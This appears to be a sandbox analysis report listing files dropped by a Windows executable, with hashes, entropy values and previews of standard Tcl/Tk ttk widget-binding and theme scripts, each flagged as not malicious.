                                                                                                                                                                                                                                                    SHA1:0E69C6AB9E03049592107BEDD37A9F9D45C7F139
                                                                                                                                                                                                                                                    SHA-256:8E6958FBC899BAEB1942E0E56D3B8CF135409949FF249D9858C777922BAFBC58
                                                                                                                                                                                                                                                    SHA-512:E150C38BDE8A5370212D456D125E3B6648DD0047AE3406C735D148E310D4CDEB8732EBA0B226C0E221BACF909D4BAB8104CCD6FDCAF5148E95AB7F389B14918F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Bindings for Menubuttons..#.# Menubuttons have three interaction modes:.#.# Pulldown: Press menubutton, drag over menu, release to activate menu entry.# Popdown: Click menubutton to post menu.# Keyboard: <Key-space> or accelerator key to post menu.#.# (In addition, when menu system is active, "dropdown" -- menu posts.# on mouse-over. Ttk menubuttons don't implement this)..#.# For keyboard and popdown mode, we hand off to tk_popup and let .# the built-in Tk bindings handle the rest of the interaction..#.# ON X11:.#.# Standard Tk menubuttons use a global grab on the menubutton..# This won't work for Ttk menubuttons in pulldown mode,.# since we need to process the final <ButtonRelease> event,.# and this might be delivered to the menu. So instead we.# rely on the passive grab that occurs on <ButtonPress> events,.# and transition to popdown mode when the mouse is released.# or dragged outside the menubutton..# .# ON WINDOWS:.#.# I'm not sure what the hell is going on here. [$menu pos
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5619
                                                                                                                                                                                                                                                    Entropy (8bit):4.937953914483602
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:d4tDJf49tzG809fhQAKWCgQOK/6PF+xEi8YYFSL+3FJVCj0QFK2kfJcQIni:d4tktzwfWngQOK/6PF+xDDYFNJVCj0QW
                                                                                                                                                                                                                                                    MD5:3495A94EF36592652ABF1B34298B1F58
                                                                                                                                                                                                                                                    SHA1:1D4AD25752A418B654AAD7F486A260DA312170CE
                                                                                                                                                                                                                                                    SHA-256:F44CA6DC4E54B73C43BBF546CD3E1EC1E7158024B76E0D8D99AE1477A8F50ED5
                                                                                                                                                                                                                                                    SHA-512:BDD114CF1253FFECF7B3C449FD5633B361AFB3723F8E608746E52453E8ED616085A96E691BB79AC1C3AC7057DAEEA660497E1769AA389341D66CF5137313534B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Bindings for TNotebook widget.#..namespace eval ttk::notebook {. variable TLNotebooks ;# See enableTraversal.}..bind TNotebook <ButtonPress-1>..{ ttk::notebook::Press %W %x %y }.bind TNotebook <Key-Right>..{ ttk::notebook::CycleTab %W 1; break }.bind TNotebook <Key-Left>..{ ttk::notebook::CycleTab %W -1; break }.bind TNotebook <Control-Key-Tab>.{ ttk::notebook::CycleTab %W 1; break }.bind TNotebook <Control-Shift-Key-Tab>.{ ttk::notebook::CycleTab %W -1; break }.catch {.bind TNotebook <Control-ISO_Left_Tab>.{ ttk::notebook::CycleTab %W -1; break }.}.bind TNotebook <Destroy>..{ ttk::notebook::Cleanup %W }..# ActivateTab $nb $tab --.#.Select the specified tab and set focus..#.# Desired behavior:.#.+ take focus when reselecting the currently-selected tab;.#.+ keep focus if the notebook already has it;.#.+ otherwise set focus to the first traversable widget.#. in the newly-selected tab;.#.+ do not leave the focus in a deselected tab..#.proc ttk::notebook::ActivateTab {w tab} {.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1920
                                                                                                                                                                                                                                                    Entropy (8bit):4.916119835701688
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:kfkVpfktNZz51kfkB6fkO/cfkyk2fkI4fkI1fkxUufkYfkEtNMiyHvyPHfk9tNZ5:0ZPhMiyHvyPQZNtiisZvUriZPaa+fdl
                                                                                                                                                                                                                                                    MD5:A12915FA5CAF93E23518E9011200F5A4
                                                                                                                                                                                                                                                    SHA1:A61F665A408C10419FB81001578D99B43D048720
                                                                                                                                                                                                                                                    SHA-256:CE0053D637B580170938CF552B29AE890559B98EB28038C2F0A23A265DDEB273
                                                                                                                                                                                                                                                    SHA-512:669E1D66F1223CCA6CEB120914D5D876BD3CF401EE4A46F35825361076F19C7341695596A7DBB00D6CFF4624666FB4E7A2D8E7108C3C56A12BDA7B04E99E6F9A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Bindings for ttk::panedwindow widget..#..namespace eval ttk::panedwindow {. variable State. array set State {..pressed 0. .pressX.-..pressY.-..sash .-..sashPos -. }.}..## Bindings:.#.bind TPanedwindow <ButtonPress-1> .{ ttk::panedwindow::Press %W %x %y }.bind TPanedwindow <B1-Motion>..{ ttk::panedwindow::Drag %W %x %y }.bind TPanedwindow <ButtonRelease-1> .{ ttk::panedwindow::Release %W %x %y }..bind TPanedwindow <Motion> ..{ ttk::panedwindow::SetCursor %W %x %y }.bind TPanedwindow <Enter> ..{ ttk::panedwindow::SetCursor %W %x %y }.bind TPanedwindow <Leave> ..{ ttk::panedwindow::ResetCursor %W }.# See <<NOTE-PW-LEAVE-NOTIFYINFERIOR>>.bind TPanedwindow <<EnteredChild>>.{ ttk::panedwindow::ResetCursor %W }..## Sash movement:.#.proc ttk::panedwindow::Press {w x y} {. variable State.. set sash [$w identify $x $y]. if {$sash eq ""} {. .set State(pressed) 0..return. }. set State(pressed) .1. set State(pressX) .$x. set State(pressY) .$y. set State(sa
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1089
                                                                                                                                                                                                                                                    Entropy (8bit):4.7101709883442755
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:o83oOUyNSiBj0oNA7h5EwIa2s0ImxamrNlUImyJDirNPpwWgJ:oMtS6j0eyEw0s02mhlU4khPp4J
                                                                                                                                                                                                                                                    MD5:B0074341A4BDA36BCDFF3EBCAE39EB73
                                                                                                                                                                                                                                                    SHA1:D070A01CC5A787249BC6DAD184B249C4DD37396A
                                                                                                                                                                                                                                                    SHA-256:A9C34F595E547CE94EE65E27C415195D2B210653A9FFCFB39559C5E0FA9C06F8
                                                                                                                                                                                                                                                    SHA-512:AF23563602886A648A42B03CC5485D84FCC094AB90B08DF5261434631B6C31CE38D83A3A60CC7820890C797F6C778D5B5EFF47671CE3EE4710AB14C6110DCC35
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Ttk widget set: progress bar utilities..#..namespace eval ttk::progressbar {. variable Timers.;# Map: widget name -> after ID.}..# Autoincrement --.#.Periodic callback procedure for autoincrement mode.#.proc ttk::progressbar::Autoincrement {pb steptime stepsize} {. variable Timers.. if {![winfo exists $pb]} {. .# widget has been destroyed -- cancel timer..unset -nocomplain Timers($pb)..return. }.. set Timers($pb) [after $steptime \. .[list ttk::progressbar::Autoincrement $pb $steptime $stepsize] ].. $pb step $stepsize.}..# ttk::progressbar::start --.#.Start autoincrement mode. Invoked by [$pb start] widget code..#.proc ttk::progressbar::start {pb {steptime 50} {stepsize 1}} {. variable Timers. if {![info exists Timers($pb)]} {..Autoincrement $pb $steptime $stepsize. }.}..# ttk::progressbar::stop --.#.Cancel autoincrement mode. Invoked by [$pb stop] widget code..#.proc ttk::progressbar::stop {pb} {. variable Timers. if {[info exists Timers($pb
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2662
                                                                                                                                                                                                                                                    Entropy (8bit):4.706471568010083
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:6Zs2iYagzZtYRqucO6wEKyRtZt0TcKVqZ4TFZkPDMiNf:WJyItYRquMwEKyFt0TcKVG4TrkLMwf
                                                                                                                                                                                                                                                    MD5:CB563E4CC3C309D66BA4D6841F7C65D9
                                                                                                                                                                                                                                                    SHA1:5F4FFFB858D6948A51FC8CB96225F1E4EB8E4931
                                                                                                                                                                                                                                                    SHA-256:F4BC65A8FFE7E9F9F3B1C3DF496B1B873FA308F38BD86E908E0F8D8EB1026119
                                                                                                                                                                                                                                                    SHA-512:E960488715BB8C084B08AB9B966F0F30F5741F604C55FC1C681D316A0924D8B95C69EA5EDFA81711FBAF10C7E53C2F235E9651E7A5AA091A31F341F3E3355AB2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# scale.tcl - Copyright (C) 2004 Pat Thoyts <patthoyts@users.sourceforge.net>.#.# Bindings for the TScale widget..namespace eval ttk::scale {. variable State. array set State {..dragging 0. }.}..bind TScale <ButtonPress-1> { ttk::scale::Press %W %x %y }.bind TScale <B1-Motion> { ttk::scale::Drag %W %x %y }.bind TScale <ButtonRelease-1> { ttk::scale::Release %W %x %y }..bind TScale <ButtonPress-2> { ttk::scale::Jump %W %x %y }.bind TScale <B2-Motion> { ttk::scale::Drag %W %x %y }.bind TScale <ButtonRelease-2> { ttk::scale::Release %W %x %y }..bind TScale <ButtonPress-3> { ttk::scale::Jump %W %x %y }.bind TScale <B3-Motion> { ttk::scale::Drag %W %x %y }.bind TScale <ButtonRelease-3> { ttk::scale::Release %W %x %y }..bind TScale <Left> { ttk::scale::Increment %W -1 }.bind TScale <Up> { ttk::scale::Increment %W -1 }.bind TScale <Right> { ttk::scale::Increment %W 1 }.bind TScale <Down> { ttk::scale::Increment %W
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3097
                                                                                                                                                                                                                                                    Entropy (8bit):4.913511104649656
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:OsSofRsvfH3Noo2kvrjnWG3Lcyst0Rhrdy:plcHdoorDjWEFeuTy
                                                                                                                                                                                                                                                    MD5:93181DBE76EF9C39849A09242D6DF8C0
                                                                                                                                                                                                                                                    SHA1:DE3B47AFC3E5371BF1CD0541790A9B78A97570AB
                                                                                                                                                                                                                                                    SHA-256:5932043286A30A3CFFB2B6CE68CCDB9172A718F32926E25D3A962AE63CAD515C
                                                                                                                                                                                                                                                    SHA-512:5C85284E063A5DE17F6CE432B3EF899D046A78725BD1F930229576BED1116C03A3EE0611B988E9903F47DA8F694483E5A76464450C48EB14622F6784004B8F7E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Bindings for TScrollbar widget.#..# Still don't have a working ttk::scrollbar under OSX -.# Swap in a [tk::scrollbar] on that platform,.# unless user specifies -class or -style..#.if {[tk windowingsystem] eq "aqua"} {. rename ::ttk::scrollbar ::ttk::_scrollbar. proc ttk::scrollbar {w args} {..set constructor ::tk::scrollbar..foreach {option _} $args {.. if {$option eq "-class" || $option eq "-style"} {...set constructor ::ttk::_scrollbar...break.. }..}..return [$constructor $w {*}$args]. }.}..namespace eval ttk::scrollbar {. variable State. # State(xPress).--. # State(yPress).-- initial position of mouse at start of drag.. # State(first).-- value of -first at start of drag..}..bind TScrollbar <ButtonPress-1> .{ ttk::scrollbar::Press %W %x %y }.bind TScrollbar <B1-Motion>..{ ttk::scrollbar::Drag %W %x %y }.bind TScrollbar <ButtonRelease-1>.{ ttk::scrollbar::Release %W %x %y }..bind TScrollbar <ButtonPress-2> .{ ttk::scrollbar::Jump %W %x %y }.bind TScrollb
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2392
                                                                                                                                                                                                                                                    Entropy (8bit):4.778050320627444
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:KqL4L1BItZ3EZEhHR4vuRbMMie8GMW/H7vZZNQdqrYfy2nL+ZZvBb:KDhBIjHHRmiM1qvbnNQdqriyQIvB
                                                                                                                                                                                                                                                    MD5:BD1F47CE81C8690462B050CED53A6817
                                                                                                                                                                                                                                                    SHA1:318EB1F966A7E04E75F376D5D748E80A68E99A13
                                                                                                                                                                                                                                                    SHA-256:ED31FA0B0D3438ACAD3384DDE1E562033E0D9A035E5056322DA219D6C4CBD912
                                                                                                                                                                                                                                                    SHA-512:7BDF0438806A2962B553F9062077522BD03EED1088B7D66C652920786A10D19897F263C195AAA6E29023D9BC69C33BBEF189CE082A2DCD2611336448E5CBD87D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Sizegrip widget bindings..#.# Dragging a sizegrip widget resizes the containing toplevel..#.# NOTE: the sizegrip widget must be in the lower right hand corner..#..switch -- [tk windowingsystem] {. x11 -. win32 {..option add *TSizegrip.cursor [ttk::cursor seresize]. }. aqua {. .# Aqua sizegrips use default Arrow cursor.. }.}..namespace eval ttk::sizegrip {. variable State. array set State {..pressed .0..pressX ..0..pressY ..0..width ..0..height ..0..widthInc.1..heightInc.1. resizeX 1. resizeY 1..toplevel .{}. }.}..bind TSizegrip <ButtonPress-1> ..{ ttk::sizegrip::Press.%W %X %Y }.bind TSizegrip <B1-Motion> ..{ ttk::sizegrip::Drag .%W %X %Y }.bind TSizegrip <ButtonRelease-1> .{ ttk::sizegrip::Release %W %X %Y }..proc ttk::sizegrip::Press {W X Y} {. variable State.. if {[$W instate disabled]} { return }.. set top [winfo toplevel $W].. # If the toplevel is not resizable then bail. foreach {State(resizeX) State(resi
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4255
                                                                                                                                                                                                                                                    Entropy (8bit):4.9576194953603006
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:17n+wMf6/ocy2nO6lz+Ni2QQ0Q3LqSFLfhrxJSS3hQb:ln+wMOxVlaNi2QQ0QbdFLfhrxJzhQb
                                                                                                                                                                                                                                                    MD5:86BCA3AB915C2774425B70420E499140
                                                                                                                                                                                                                                                    SHA1:FD4798D79EEBA9CFFABCB2548068591DB531A716
                                                                                                                                                                                                                                                    SHA-256:51F8A6C772648541684B48622FFE41B77871A185A8ACD11E9DEC9EC41D65D9CD
                                                                                                                                                                                                                                                    SHA-512:659FB7E1631ED898E3C11670A04B953EB05CECB42A3C5EFBDD1BD97A7F99061920FD5DB3915476F224BB2C72358623E1B474B0FC3FBB7FD3734487B87A388FD7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# ttk::spinbox bindings.#..namespace eval ttk::spinbox { }..### Spinbox bindings..#.# Duplicate the Entry bindings, override if needed:.#..ttk::copyBindings TEntry TSpinbox..bind TSpinbox <Motion>...{ ttk::spinbox::Motion %W %x %y }.bind TSpinbox <ButtonPress-1> ..{ ttk::spinbox::Press %W %x %y }.bind TSpinbox <ButtonRelease-1> .{ ttk::spinbox::Release %W }.bind TSpinbox <Double-Button-1> .{ ttk::spinbox::DoubleClick %W %x %y }.bind TSpinbox <Triple-Button-1> .{} ;# disable TEntry triple-click..bind TSpinbox <KeyPress-Up>..{ event generate %W <<Increment>> }.bind TSpinbox <KeyPress-Down> ..{ event generate %W <<Decrement>> }..bind TSpinbox <<Increment>>..{ ttk::spinbox::Spin %W +1 }.bind TSpinbox <<Decrement>> ..{ ttk::spinbox::Spin %W -1 }..ttk::bindMouseWheel TSpinbox ..[list ttk::spinbox::MouseWheel %W]..## Motion --.#.Sets cursor..#.proc ttk::spinbox::Motion {w x y} {. if { [$w identify $x $y] eq "textarea". && [$w instate {!readonly !disabled}]. } {..ttk::setCurso
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8863
                                                                                                                                                                                                                                                    Entropy (8bit):4.859904243190413
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:2Ou002W8wZ4sNNxjKomA3xj9L/37NbbFqG4eeMxCSbk3TPMrngEibSB1GjwPBKse:ZW8+Z5BDX+DsXibSQUMHLCGLdE2bZ
                                                                                                                                                                                                                                                    MD5:9C5111CC62F08184168CA4A78BFAF2A1
                                                                                                                                                                                                                                                    SHA1:7887070F9F66E3899F41A8069EC28B19221DF892
                                                                                                                                                                                                                                                    SHA-256:09C8967608A4C9887F12288C22765161F53016CECF1870CA8D6AEE6ECC4EC1D1
                                                                                                                                                                                                                                                    SHA-512:6EB4290BF3C4C6E06243A3707791582B403E55D072F1D52A494F9E5D77574E0BAB5B91467D1193D77A8F5793481C801F6E41B94DE7BF67282781938D4A4EA90C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# ttk::treeview widget bindings and utilities..#..namespace eval ttk::treeview {. variable State.. # Enter/Leave/Motion. #. set State(activeWidget) .{}. set State(activeHeading) .{}.. # Press/drag/release:. #. set State(pressMode) .none. set State(pressX)..0.. # For pressMode == "resize". set State(resizeColumn).#0.. # For pressmode == "heading". set State(heading) .{}.}..### Widget bindings..#..bind Treeview.<Motion> ..{ ttk::treeview::Motion %W %x %y }.bind Treeview.<B1-Leave>..{ #nothing }.bind Treeview.<Leave>...{ ttk::treeview::ActivateHeading {} {}}.bind Treeview.<ButtonPress-1> .{ ttk::treeview::Press %W %x %y }.bind Treeview.<Double-ButtonPress-1> .{ ttk::treeview::DoubleClick %W %x %y }.bind Treeview.<ButtonRelease-1> .{ ttk::treeview::Release %W %x %y }.bind Treeview.<B1-Motion> ..{ ttk::treeview::Drag %W %x %y }.bind Treeview .<KeyPress-Up> .{ ttk::treeview::Keynav %W up }.bind Treeview .<KeyPress-Down> .{ ttk::treeview::Keynav %
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4546
                                                                                                                                                                                                                                                    Entropy (8bit):4.888987944406022
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:53a25129CKELfMonw+PzpaVnNqovaq2126262R2D2q2k2j+/2FhbtpGt0vcWOQRg:53j5MoKE7JEnN7CTMDDA6Tlj+uFhbttK
                                                                                                                                                                                                                                                    MD5:E38B399865C45E49419C01FF2ADDCE75
                                                                                                                                                                                                                                                    SHA1:F8A79CBC97A32622922D4A3A5694BCCB3F19DECB
                                                                                                                                                                                                                                                    SHA-256:61BAA0268770F127394A006340D99CE831A1C7AD773181C0C13122F7D2C5B7F6
                                                                                                                                                                                                                                                    SHA-512:285F520B648F5EC70DD79190C3B456F4D6DA2053210985F9E2C84139D8D51908296E4962B336894EE30536F09FAE84B912BC2ABF44A7011620F66CC5D9F71A8C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Ttk widget set initialization script..#..### Source library scripts..#..namespace eval ::ttk {. variable library. if {![info exists library]} {..set library [file dirname [info script]]. }.}..source [file join $::ttk::library fonts.tcl].source [file join $::ttk::library cursors.tcl].source [file join $::ttk::library utils.tcl]..## ttk::deprecated $old $new --.#.Define $old command as a deprecated alias for $new command.#.$old and $new must be fully namespace-qualified..#.proc ttk::deprecated {old new} {. interp alias {} $old {} ttk::do'deprecate $old $new.}.## do'deprecate --.#.Implementation procedure for deprecated commands --.#.issue a warning (once), then re-alias old to new..#.proc ttk::do'deprecate {old new args} {. deprecated'warning $old $new. interp alias {} $old {} $new. uplevel 1 [linsert $args 0 $new].}..## deprecated'warning --.#.Gripe about use of deprecated commands..#.proc ttk::deprecated'warning {old new} {. puts stderr "$old deprecated -- u
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8562
                                                                                                                                                                                                                                                    Entropy (8bit):4.958950985117383
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:MpEpXI4jqmW/y3gp9F+QE9PBRc+vWHJOfqW8j3ki3LDRdielRu+MXw+:6yXuwg1oPnc+epOEj31/s/5
                                                                                                                                                                                                                                                    MD5:65193FE52D77B8726B75FBF909EE860A
                                                                                                                                                                                                                                                    SHA1:991DEDD4666462DD9776FDF6C21F24D6CF794C85
                                                                                                                                                                                                                                                    SHA-256:C7CC9A15CFA999CF3763772729CC59F629E7E060AF67B7D783C50530B9B756E1
                                                                                                                                                                                                                                                    SHA-512:E43989F5F368D2E19C9A3521FB82C6C1DD9EEB91DF936A980FFC7674C8B236CB84E113908B8C9899B85430E8FC30315BDEC891071822D701C91C5978096341B7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Utilities for widget implementations..#..### Focus management..#.# See also: #1516479.#..## ttk::takefocus --.#.This is the default value of the "-takefocus" option.#.for ttk::* widgets that participate in keyboard navigation..#.# NOTES:.#.tk::FocusOK (called by tk_focusNext) tests [winfo viewable].#.if -takefocus is 1, empty, or missing; but not if it's a.#.script prefix, so we have to check that here as well..#.#.proc ttk::takefocus {w} {. expr {[$w instate !disabled] && [winfo viewable $w]}.}..## ttk::GuessTakeFocus --.#.This routine is called as a fallback for widgets.#.with a missing or empty -takefocus option..#.#.It implements the same heuristics as tk::FocusOK..#.proc ttk::GuessTakeFocus {w} {. # Don't traverse to widgets with '-state disabled':. #. if {![catch {$w cget -state} state] && $state eq "disabled"} {..return 0. }.. # Allow traversal to widgets with explicit key or focus bindings:. #. if {[regexp {Key|Focus} [concat [bind $w] [bind [winfo c
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9349
                                                                                                                                                                                                                                                    Entropy (8bit):4.613570740989389
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:kwsdZzIE2NSCyNPNVVSCIA5l/r5l/rWMi/CE38S7r/2JeJnpna+yfdyMq53ICyzl:sZzL24FVeArPKf3z7cQ0383cdd
                                                                                                                                                                                                                                                    MD5:70EFC208940AB312DF76FDB0A4C16DC2
                                                                                                                                                                                                                                                    SHA1:0AC88DA8B62875D8F7178A3666CD6CFB0E5C27E1
                                                                                                                                                                                                                                                    SHA-256:92D0FC7C0839AB4D1ED3765F6467B824735850167C22C082525BBC81EED6CC3B
                                                                                                                                                                                                                                                    SHA-512:5A16EF33E9061402F88C90ACB2A1A4C607C0606BD8AED3BAB2FBD8F75364E2E49F95118408E8C5A64A124B8D667AA53E689C88C8C498EE04E024D2FCA843A82A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Settings for Microsoft Windows Vista and Server 2008.#..# The Vista theme can only be defined on Windows Vista and above. The theme.# is created in C due to the need to assign a theme-enabled function for .# detecting when themeing is disabled. On systems that cannot support the.# Vista theme, there will be no such theme created and we must not.# evaluate this script...if {"vista" ni [ttk::style theme names]} {. return.}..namespace eval ttk::theme::vista {.. ttk::style theme settings vista {.. .ttk::style configure . \.. -background SystemButtonFace \.. -foreground SystemWindowText \.. -selectforeground SystemHighlightText \.. -selectbackground SystemHighlight \.. -font TkDefaultFont \.. ;...ttk::style map "." \.. -foreground [list disabled SystemGrayText] \.. ;...ttk::style configure TButton -anchor center -padding {1 1} -width -11..ttk::style configure TRadiobutton -padding 2..ttk::style configure TCheckbutton -padding 2..ttk::style configure TMenubu
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2643
                                                                                                                                                                                                                                                    Entropy (8bit):4.8723234445803545
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:679ahShG0Ds0IXF6yjAfSAfqFRaBgLtei42kt+5Ql/n+iOaVa9LU:6vM0uTk5tm4v
                                                                                                                                                                                                                                                    MD5:A6EFE03AC019E723627C064AC74DCBF3
                                                                                                                                                                                                                                                    SHA1:9740638A19E6B5360FD69D887A4E01D9818FE43B
                                                                                                                                                                                                                                                    SHA-256:08CE1484FF82AE2842A986B5A44EA81CC375E34687EF0896C8A45938721AA265
                                                                                                                                                                                                                                                    SHA-512:8AB802D41522080CFA974B628CFF2BA3BFC074BC0C99DCF0E0AB647D54D10C9293C7B79F842BB5E8767972CD55724C3646065A2E988D7581863AF4CFD5938EB7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Settings for 'winnative' theme..#..namespace eval ttk::theme::winnative {. ttk::style theme settings winnative {...ttk::style configure "." \.. -background SystemButtonFace \.. -foreground SystemWindowText \.. -selectforeground SystemHighlightText \.. -selectbackground SystemHighlight \.. -troughcolor SystemScrollbar \.. -font TkDefaultFont \.. ;...ttk::style map "." -foreground [list disabled SystemGrayText] ;. ttk::style map "." -embossed [list disabled 1] ;...ttk::style configure TButton \.. -anchor center -width -11 -relief raised -shiftrelief 1..ttk::style configure TCheckbutton -padding "2 4"..ttk::style configure TRadiobutton -padding "2 4"..ttk::style configure TMenubutton \.. -padding "8 4" -arrowsize 3 -relief raised...ttk::style map TButton -relief {{!disabled pressed} sunken}...ttk::style configure TEntry \.. -padding 2 -selectborderwidth 0 -insertwidth 1..ttk::style map TEntry \.. -fieldbackground \.. .[list readonly System
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1920
                                                                                                                                                                                                                                                    Entropy (8bit):4.940443388600074
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:NaxYun9ahShk/T5QNt+7aVzEmAf8Afb9AfMML:kq1eb
                                                                                                                                                                                                                                                    MD5:176A5DCEB7CF7A201B517B859F923F42
                                                                                                                                                                                                                                                    SHA1:207D85B0ADB45BBCFEBCAEC9E2633FF353BB6449
                                                                                                                                                                                                                                                    SHA-256:351BA00B3A02748FCE2DF2AB79D0C30C445DEF179005B6D7DB739CE3AA8C1658
                                                                                                                                                                                                                                                    SHA-512:07B4466DBD22067D5E038B09D1EA7F578C817E3B73BCBB1F66533A48B817F8400E01B79F5F5FC2FAC46942F5E0DF98745A52E08F5DE078669D771E3794C01F91
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Settings for 'xpnative' theme.#..namespace eval ttk::theme::xpnative {.. ttk::style theme settings xpnative {...ttk::style configure . \.. -background SystemButtonFace \.. -foreground SystemWindowText \.. -selectforeground SystemHighlightText \.. -selectbackground SystemHighlight \.. -font TkDefaultFont \.. ;...ttk::style map "." \.. -foreground [list disabled SystemGrayText] \.. ;...ttk::style configure TButton -anchor center -padding {1 1} -width -11..ttk::style configure TRadiobutton -padding 2..ttk::style configure TCheckbutton -padding 2..ttk::style configure TMenubutton -padding {8 4}...ttk::style configure TNotebook -tabmargins {2 2 2 0}..ttk::style map TNotebook.Tab \.. -expand [list selected {2 2 2 2}]...# Treeview:..ttk::style configure Heading -font TkHeadingFont..ttk::style configure Treeview -background SystemWindow..ttk::style map Treeview \.. -background [list selected SystemHighlight] \.. -foreground [list selected SystemHighlight
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):11390
                                                                                                                                                                                                                                                    Entropy (8bit):5.001395733354833
                                                                                                                                                                                                                                                    Encrypted:false
